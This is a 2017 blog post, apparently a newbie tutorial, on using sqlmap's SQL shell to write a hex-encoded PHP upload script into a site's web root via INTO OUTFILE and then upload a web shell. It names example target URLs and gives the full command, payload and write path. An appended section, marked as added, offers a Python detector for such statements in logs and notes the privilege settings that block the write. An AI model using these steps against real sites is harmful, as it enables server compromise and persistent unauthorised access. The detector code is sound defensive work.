Sunday, July 23, 2017

How to Upload a Shell with Sqlmap

Just a newbie who wants to share so we can all learn together.

Surely you all already know the tool called sqlmap. It's a great SQLi tool for newbies like me.

This time I want to share some newbie knowledge I picked up from here and there: how to upload a shell using sqlmap.

First, of course, we need a target.
Here's an example target:
http://dewa-maho.com/tusuk.php?id=5

Then prepare your upload script. As an example, this is the script I'm going to upload:
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

But first, convert the script above to hex before it can be uploaded; you can do that HERE. The result is a single long hex string.

  1. Open a terminal, then open sqlmap. If you don't have it yet, download it HERE.
  2. python sqlmap.py -u http://wewegombel.com/index.php?id=5 --sql-shell 
  3. Then output roughly like this will appear:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
 
Now type SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
Don't forget to add '0x' in front of the 'HEX'.
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 ​ 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 ​ 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
INTO OUTFILE "/home/relax/public_html/upload.php";

Wait, and if you're lucky there will be a notice that the upload succeeded. If you're unlucky, just try again.

If it worked, browse to the file we just wrote:

http://wewegombel.com/upload.php

Then upload the shell. OK, hope this helps.
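
A defensive counterpart to the statement above, added here as an example and not part of the original post: a heuristic that scans MySQL general query log or web access log lines for a hex literal written with INTO OUTFILE, decodes it, and flags script paths or server-side code in the payload. The log lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Statement shape from the post: SELECT 0x<hex> INTO OUTFILE "<path>" (DUMPFILE included).
OUTFILE_RE = re.compile(
    r"select\s+0x([0-9a-f]+)\s+into\s+(?:out|dump)file\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")
CODE_MARKERS = (b"<?php", b"<?=", b"<%", b"move_uploaded_file", b"$_files")


def inspect_query(sql):
    """Return a finding dict if sql writes a hex literal to a file, else None."""
    m = OUTFILE_RE.search(sql)
    if not m:
        return None
    hex_body, path = m.group(1), m.group(2)
    if len(hex_body) % 2:  # MySQL treats odd-length 0x literals as left-padded with 0
        hex_body = "0" + hex_body
    payload = bytes.fromhex(hex_body).lower()
    reasons = []
    if path.lower().endswith(SCRIPT_EXT):
        reasons.append("script extension")
    if any(marker in payload for marker in CODE_MARKERS):
        reasons.append("server-side code in payload")
    return {"path": path, "size": len(payload), "reasons": reasons,
            "severity": "high" if reasons else "medium"}


def scan_log(lines):
    """Scan query-log or access-log lines; URL-decode first so encoded requests match."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = inspect_query(unquote_plus(line))
        if finding:
            findings.append({"line": number, **finding})
    return findings


# Constructed sample lines (not from the original post).
_PHP_HEX = "<?php echo 'x'; ?>".encode().hex()
SAMPLE_LOG = [
    "2017-07-23T15:35:06Z 12 Query SELECT name FROM items WHERE id=5",
    f"2017-07-23T15:36:10Z 12 Query select 0x{_PHP_HEX} into outfile '/var/www/html/up.php'",
    "2017-07-23T15:40:00Z 14 Query SELECT 0x68656c6c6f INTO OUTFILE '/tmp/export.txt'",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The write fails outright when the application's MySQL account lacks the FILE privilege, or when secure_file_priv is NULL or points to a directory outside the web root.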
